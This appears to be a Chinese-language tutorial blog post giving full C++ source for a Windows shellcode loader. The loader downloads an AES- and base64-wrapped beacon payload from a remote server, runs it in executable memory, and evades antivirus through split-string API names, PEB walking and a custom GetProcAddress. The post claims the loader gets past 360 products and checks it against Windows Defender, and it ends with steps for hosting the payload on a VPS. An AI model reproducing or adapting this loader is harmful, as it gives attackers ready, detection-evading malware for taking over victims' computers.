{void* exec;int payload_len = 500000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "lTbb3qMe8NsPKPjzTRaEzg==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存//使用默认设置创建会话session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应HttpSendRequest(reqfile, NULL, 0, 0, 0);InternetReadFile(reqfile, exec, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string base64EncodedContent(reinterpret_cast<const char*>(exec), nread);std::string base64DecodedContent;//base64EncodedContent = ko::Base64::encode(base64EncodedContent);base64DecodedContent = ko::Base64::decode(base64EncodedContent);void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (alloc == nullptr) {std::cerr << "Failed to allocate memory." 
<< std::endl;return 1;}// Copy decoded content to allocated memorymemcpy(alloc, base64DecodedContent.data(), base64DecodedContent.size());// Execute the allocated contentvoid (*shellcode)() = reinterpret_cast<void(*)()>(alloc);shellcode();// Free the allocated memoryVirtualFree(alloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

那么按照这个套路继续写以下几个算法
增加AES算法
目前的顺序是:服务端先 base64 再 AES 加密,生成 aesencode.txt 文件;那么木马端解密要反过来,先解密 AES 再解码 base64。
在这里插入图片描述
可以看到成功上线
增加的代码如下
在这里插入图片描述
到这里就完成了我们的AES+base64+远程加载(请求的地址进行了AES加密)
base64加密使用到的python代码
在这里插入图片描述
AES加密使用到的项目
在这里插入图片描述
目前全代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")typedef LPVOID(WINAPI* VirtualAllocT)(_In_opt_ LPVOID lpAddress,_In_     SIZE_T dwSize,_In_     DWORD flAllocationType,_In_     DWORD flProtect);typedef HINTERNET(WINAPI* InternetOpenW_T)(_In_opt_ LPCWSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCWSTR lpszProxy,_In_opt_ LPCWSTR lpszProxyBypass,_In_ DWORD dwFlags);typedef HINTERNET(WINAPI* InternetConnectW_T)(_In_ HINTERNET hInternet,_In_ LPCWSTR lpszServerName,_In_ INTERNET_PORT nServerPort,_In_opt_ LPCWSTR lpszUserName,_In_opt_ LPCWSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpOpenRequestW_T)(_In_ HINTERNET hConnect,_In_opt_ LPCWSTR lpszVerb,_In_opt_ LPCWSTR lpszObjectName,_In_opt_ LPCWSTR lpszVersion,_In_opt_ LPCWSTR lpszReferrer,_In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpSendRequestW_T)(_In_ HINTERNET hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);typedef HINTERNET(WINAPI* InternetReadFile_T)(_In_ HINTERNET hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);
FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {// Get the address of the module's PE headerBYTE* pImageBase = (BYTE*)hModule;IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);// Get the address of the export directoryIMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);if (strcmp(lpProcName, pName) == 0) {WORD ordinal = pAddressOfNameOrdinals[i];DWORD functionRVA = pAddressOfFunctions[ordinal];FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);return pFunction;}}return NULL;
}void decode(string& c, int key[]) {int len = c.size();for (int i = 0; i < len; i++) {c[i] = c[i] ^ key[i % 7]; //使用循环遍历字符串 c 中的每个字符。在每次迭代中,执行异或操作 c[i] ^ key[i % 7],将字符串的当前字符与密钥数组中对应位置的值进行异或运算。}
}//AES的key和iv
// AES key and IV. Both are plain string literals compiled into the binary, so
// they can be read straight out of the executable. DecryptionAES below calls
// Decrypt with AES::CBC, so the IV is actually used here despite the ECB note.
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg"; // ECB mode does not use the chain; may be left empty
// Base64-decode strSrc, AES-CBC-decrypt it with the file-level g_key / g_iv and
// strip PKCS7 padding. Returns the plaintext as a std::string. If the padding
// bytes disagree, the whole output buffer is zeroed and a message is printed,
// so the returned string is then empty.
//
// NOTE(review): the padding check does not do what it reads as:
//   - `0x00 < szDataOut[length - 1] <= 0x16` parses as
//     `(0x00 < x) <= 0x16`, a bool compared with 22, which is always true.
//   - AES's block is 16 bytes (MakeKey is called with 16, 16), so a valid
//     PKCS7 pad byte is 0x01..0x10, not 0x16.
//   - `length` is size_t while `tmp` and `i` are int; where char is signed a
//     final byte >= 0x80 makes `tmp` negative, and an empty input reads
//     szDataOut[length - 1] out of bounds.
//   - `string strDest(szDataOut)` stops at the first NUL, so binary plaintext
//     is truncated.
string DecryptionAES(const string& strSrc) // AES decryption
{
    string strData = ko::Base64::decode(strSrc);
    size_t length = strData.length();
    // ciphertext
    char* szDataIn = new char[length + 1];
    memcpy(szDataIn, strData.c_str(), length + 1);
    // plaintext
    char* szDataOut = new char[length + 1];
    memcpy(szDataOut, strData.c_str(), length + 1);
    // AES decryption in CBC mode
    AES aes;
    aes.MakeKey(g_key, g_iv, 16, 16);
    aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);
    // strip PKCS7 padding
    if (0x00 < szDataOut[length - 1] <= 0x16)
    {
        int tmp = szDataOut[length - 1];
        for (int i = length - 1; i >= length - tmp; i--)
        {
            if (szDataOut[i] != tmp)
            {
                memset(szDataOut, 0, length);
                cout << "去填充失败!解密出错!!" << endl;
                break;
            }
            else
                szDataOut[i] = 0;
        }
    }
    string strDest(szDataOut);
    delete[] szDataIn;
    delete[] szDataOut;
    return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* axac;int payload_len = 500000;   //shellcode大小  string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);// 将 std::string 转换为宽字符串 LPCWSTRint hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   //端口string enpath = "EkYwlGs7z8OzXAEs7rszZA==";   //对应的文件string depath = DecryptionAES(enpath);// 将 std::string 转换为宽字符串 LPCWSTRint pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;char xyVAc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };VirtualAllocT pVAc = (VirtualAllocT)CustomGetProcAddress(LoadLibrary(L"kernel32.dll"), xyVAc);axac = pVAc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存  1//使用默认设置创建会话char xyIto[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','W',0 };InternetOpenW_T pItO = (InternetOpenW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyIto);//session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);  2session = pItO(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机char xyItC[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','W',0 };InternetConnectW_T pItC = (InternetConnectW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyItC);//conn = InternetConnect(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);  3conn = pItC(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求char xyHOR[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','W',0 };HttpOpenRequestW_T pHOR = 
(HttpOpenRequestW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyHOR);//reqfile = HttpOpenRequest(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);  4reqfile = pHOR(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应char xyHSR[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };HttpSendRequestW_T pHSR = (HttpSendRequestW_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyHSR);//HttpSendRequest(reqfile, NULL, 0, 0, 0);  5pHSR(reqfile, NULL, 0, 0, 0);char xyIRF[] = { 'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };InternetReadFile_T pIRF = (InternetReadFile_T)CustomGetProcAddress(LoadLibrary(L"wininet.dll"), xyIRF);//InternetReadFile(reqfile, exec, payload_len, &nread);  6pIRF(reqfile, axac, payload_len, &nread);// Convert the vector to Base64-encoded stringstd::string AESEncodedContent(reinterpret_cast<const char*>(axac), nread);std::string base64DecodedContent;//base64EncodedContent = ko::Base64::encode(base64EncodedContent);string AESDecodedContent = DecryptionAES(AESEncodedContent);base64DecodedContent = ko::Base64::decode(AESDecodedContent);//void* alloc = VirtualAlloc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);void* elloc = pVAc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (elloc == nullptr) {std::cerr << "Failed to allocate memory." << std::endl;return 1;}// Copy decoded content to allocated memorymemcpy(elloc, base64DecodedContent.data(), base64DecodedContent.size());// Execute the allocated contentvoid (*shellcode)() = reinterpret_cast<void(*)()>(elloc);shellcode();// Free the allocated memoryVirtualFree(elloc, 0, MEM_RELEASE);//((void(*)())exec)();//Save the Base64-encoded content to a file//std::ofstream outFile("base64_encoded_content.txt", std::ios::out);//outFile << base64EncodedContent;//outFile.close();//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

接下来我们把敏感函数规避下,还有内存方面的规避,还有虚拟机的检测

敏感函数规避
LoadLibrary(L"kernel32.dll")改成getKernel32Address
使用于x64机器下
在这里插入图片描述
在这里插入图片描述
那么接下来我们把LoadLibrary(L"wininet.dll")也换掉

HMODULE getWininetAddress()
{HMODULE hWininet = nullptr;// 获取模块句柄hWininet = GetModuleHandle(L"wininet.dll");return hWininet;
}

在这里插入图片描述
在这里插入图片描述
成功上线,这里过的是360安全卫士,我们看看360杀毒效果咋样
在这里插入图片描述
360杀毒软件和360安全卫士静态扫描加上线全过了

完整代码

// ConsoleApplication9.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//#include <iostream>
#include <Windows.h>
#include <wininet.h>
#include "base64.h"
#include "AES.h"
#include <vector>
#include <fstream>
#include "need.h"extern "C" PVOID64 _cdecl GetPeb();
using namespace std;#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")typedef LPVOID(WINAPI* VirtualAllocT)(_In_opt_ LPVOID lpAddress,_In_     SIZE_T dwSize,_In_     DWORD flAllocationType,_In_     DWORD flProtect);typedef HINTERNET(WINAPI* InternetOpenW_T)(_In_opt_ LPCWSTR lpszAgent,_In_ DWORD dwAccessType,_In_opt_ LPCWSTR lpszProxy,_In_opt_ LPCWSTR lpszProxyBypass,_In_ DWORD dwFlags);typedef HINTERNET(WINAPI* InternetConnectW_T)(_In_ HINTERNET hInternet,_In_ LPCWSTR lpszServerName,_In_ INTERNET_PORT nServerPort,_In_opt_ LPCWSTR lpszUserName,_In_opt_ LPCWSTR lpszPassword,_In_ DWORD dwService,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpOpenRequestW_T)(_In_ HINTERNET hConnect,_In_opt_ LPCWSTR lpszVerb,_In_opt_ LPCWSTR lpszObjectName,_In_opt_ LPCWSTR lpszVersion,_In_opt_ LPCWSTR lpszReferrer,_In_opt_z_ LPCWSTR FAR* lplpszAcceptTypes,_In_ DWORD dwFlags,_In_opt_ DWORD_PTR dwContext);typedef HINTERNET(WINAPI* HttpSendRequestW_T)(_In_ HINTERNET hRequest,_In_reads_opt_(dwHeadersLength) LPCWSTR lpszHeaders,_In_ DWORD dwHeadersLength,_In_reads_bytes_opt_(dwOptionalLength) LPVOID lpOptional,_In_ DWORD dwOptionalLength);typedef HINTERNET(WINAPI* InternetReadFile_T)(_In_ HINTERNET hFile,_Out_writes_bytes_(dwNumberOfBytesToRead) __out_data_source(NETWORK) LPVOID lpBuffer,_In_ DWORD dwNumberOfBytesToRead,_Out_ LPDWORD lpdwNumberOfBytesRead);HMODULE getKernel32Address()
{PVOID64 Peb = GetPeb();PVOID64 LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb + 0x018);  //0x018是LDR相对于PEB偏移   存放着LDR的基地址UNICODE_STRING* FullName;HMODULE hKernel32 = NULL;LIST_ENTRY* pNode = NULL;pNode = (LIST_ENTRY*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr + 0x30));  //偏移到InInitializationOrderModuleListwhile (true){FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);//BaseDllName基于InInitialzationOrderModuList的偏移if (*(FullName->Buffer + 12) == '\0'){hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));//DllBasebreak;}pNode = pNode->Flink;}return hKernel32;
}//HMODULE getWininetAddress()
//{
//    PVOID64 Peb = GetPeb();
//    PVOID64 LDR_DATA_Addr = *(PVOID64*)((BYTE*)Peb + 0x018);  // 0x018 是 LDR 相对于 PEB 的偏移,存放着 LDR 的基地址
//    UNICODE_STRING* FullName;
//    HMODULE hWininet = nullptr;
//    LIST_ENTRY* pNode = nullptr;
//    pNode = (LIST_ENTRY*)(*(PVOID64*)((BYTE*)LDR_DATA_Addr + 0x30));  // 偏移到 InInitializationOrderModuleList
//    while (true)
//    {
//        FullName = (UNICODE_STRING*)((BYTE*)pNode + 0x38);  // BaseDllName 基于 InInitializationOrderModuList 的偏移
//        if (wcsstr(FullName->Buffer, L"wininet.dll") != nullptr)
//        {
//            hWininet = (HMODULE)(*((ULONG64*)((BYTE*)pNode + 0x10)));  // DllBase
//            break;
//        }
//        pNode = pNode->Flink;
//    }
//    return hWininet;
//}HMODULE getWininetAddress()
{HMODULE hWininet = nullptr;// 获取模块句柄hWininet = GetModuleHandle(L"wininet.dll");return hWininet;
}FARPROC CustomGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {// Get the address of the module's PE headerBYTE* pImageBase = (BYTE*)hModule;IMAGE_DOS_HEADER* pDosHeader = (IMAGE_DOS_HEADER*)pImageBase;IMAGE_NT_HEADERS64* pNtHeaders = (IMAGE_NT_HEADERS64*)(pImageBase + pDosHeader->e_lfanew);// Get the address of the export directoryIMAGE_DATA_DIRECTORY exportDirectory = pNtHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];IMAGE_EXPORT_DIRECTORY* pExportDir = (IMAGE_EXPORT_DIRECTORY*)(pImageBase + exportDirectory.VirtualAddress);DWORD* pAddressOfFunctions = (DWORD*)(pImageBase + pExportDir->AddressOfFunctions);WORD* pAddressOfNameOrdinals = (WORD*)(pImageBase + pExportDir->AddressOfNameOrdinals);DWORD* pAddressOfNames = (DWORD*)(pImageBase + pExportDir->AddressOfNames);for (DWORD i = 0; i < pExportDir->NumberOfNames; ++i) {LPCSTR pName = (LPCSTR)(pImageBase + pAddressOfNames[i]);if (strcmp(lpProcName, pName) == 0) {WORD ordinal = pAddressOfNameOrdinals[i];DWORD functionRVA = pAddressOfFunctions[ordinal];FARPROC pFunction = (FARPROC)(pImageBase + functionRVA);return pFunction;}}return NULL;
}//AES的key和iv
const char g_key[17] = "asdfwetyhjuytrfd";
const char g_iv[17] = "gfdertfghjkuyrtg";//ECB MODE不需要关心chain,可以填空
string DecryptionAES(const string& strSrc) //AES解密
{string strData = ko::Base64::decode(strSrc);size_t length = strData.length();//密文char* szDataIn = new char[length + 1];memcpy(szDataIn, strData.c_str(), length + 1);//明文char* szDataOut = new char[length + 1];memcpy(szDataOut, strData.c_str(), length + 1);//进行AES的CBC模式解密AES aes;aes.MakeKey(g_key, g_iv, 16, 16);aes.Decrypt(szDataIn, szDataOut, length, AES::CBC);//去PKCS7Padding填充if (0x00 < szDataOut[length - 1] <= 0x16){int tmp = szDataOut[length - 1];for (int i = length - 1; i >= length - tmp; i--){if (szDataOut[i] != tmp){memset(szDataOut, 0, length);cout << "去填充失败!解密出错!!" << endl;break;}elseszDataOut[i] = 0;}}string strDest(szDataOut);delete[] szDataIn;delete[] szDataOut;return strDest;
}int key[] = { 1,2,3,4,5,6,7 };int main()
{void* axac;int payload_len = 500000;   string enhost = "nlwJ3dl9R+5otLOXHiZ6xxxx";   //远程下载的主机的ipstring dehost = DecryptionAES(enhost);int hostLen = MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, NULL, 0);LPWSTR hostLPCWSTR = new WCHAR[hostLen];MultiByteToWideChar(CP_UTF8, 0, dehost.c_str(), -1, hostLPCWSTR, hostLen);WORD port = 8000;   string enpath = "EkYwlGs7z8OzXAEs7rszZA==";   //对应的文件string depath = DecryptionAES(enpath);int pathLen = MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, NULL, 0);LPWSTR pathLPCWSTR = new WCHAR[pathLen];MultiByteToWideChar(CP_UTF8, 0, depath.c_str(), -1, pathLPCWSTR, pathLen);HINTERNET session;HINTERNET conn;HINTERNET reqfile;DWORD nread;char xyVAc[] = { 'V','i','r','t','u','a','l','A','l','l','o','c',0 };VirtualAllocT pVAc = (VirtualAllocT)CustomGetProcAddress((HMODULE)getKernel32Address(), xyVAc);axac = pVAc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);//使用默认设置创建会话char xyIto[] = { 'I','n','t','e','r','n','e','t','O','p','e','n','W',0 };InternetOpenW_T pItO = (InternetOpenW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyIto);session = pItO(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);//连接到目标主机char xyItC[] = { 'I','n','t','e','r','n','e','t','C','o','n','n','e','c','t','W',0 };InternetConnectW_T pItC = (InternetConnectW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyItC);conn = pItC(session, hostLPCWSTR, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);//创建请求char xyHOR[] = { 'H','t','t','p','O','p','e','n','R','e','q','u','e','s','t','W',0 };HttpOpenRequestW_T pHOR = (HttpOpenRequestW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyHOR);reqfile = pHOR(conn, L"GET", pathLPCWSTR, NULL, NULL, NULL, 0, 0);//发送请求并读取响应char xyHSR[] = { 'H','t','t','p','S','e','n','d','R','e','q','u','e','s','t','W',0 };HttpSendRequestW_T pHSR = (HttpSendRequestW_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyHSR);pHSR(reqfile, NULL, 0, 0, 0);char xyIRF[] = { 
'I','n','t','e','r','n','e','t','R','e','a','d','F','i','l','e',0 };InternetReadFile_T pIRF = (InternetReadFile_T)CustomGetProcAddress((HMODULE)getWininetAddress(), xyIRF);pIRF(reqfile, axac, payload_len, &nread);std::string AESEncodedContent(reinterpret_cast<const char*>(axac), nread);std::string base64DecodedContent;string AESDecodedContent = DecryptionAES(AESEncodedContent);base64DecodedContent = ko::Base64::decode(AESDecodedContent);void* elloc = pVAc(NULL, base64DecodedContent.size(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (elloc == nullptr) {std::cerr << "Failed to allocate memory." << std::endl;return 1;}memcpy(elloc, base64DecodedContent.data(), base64DecodedContent.size());void (*shellcode)() = reinterpret_cast<void(*)()>(elloc);shellcode();VirtualFree(elloc, 0, MEM_RELEASE);//关闭所有句柄InternetCloseHandle(reqfile);InternetCloseHandle(conn);InternetCloseHandle(session);
}

更新到最新病毒库
可以看到没问题的
Windows defender试试
总共的手法有
1.请求的url进行了aes加密
2.远端的shellcode进行了先base64编码(base64只是编码,不是加密),再进行aes加密
3.导出表隐藏做了字符串打散,和自定义函数结构体(相当于重写改名)
4.进行了library的改写,通过改写成在x64下获得kernel32.dll和wininet.dll分别对照getKernel32Address函数和getWininetAddress函数
5.进行了GetProcAddress函数的改写,对照函数CustomGetProcAddress

项目使用,先base64编译bin文件,然后aes编译生成的a.txt文件
test.txt是base64加密beacon811.bin的文件
aesencode.txt是aes加密test.txt后的文件
将aesencode.txt放到vps上
开启python3 -m http.server
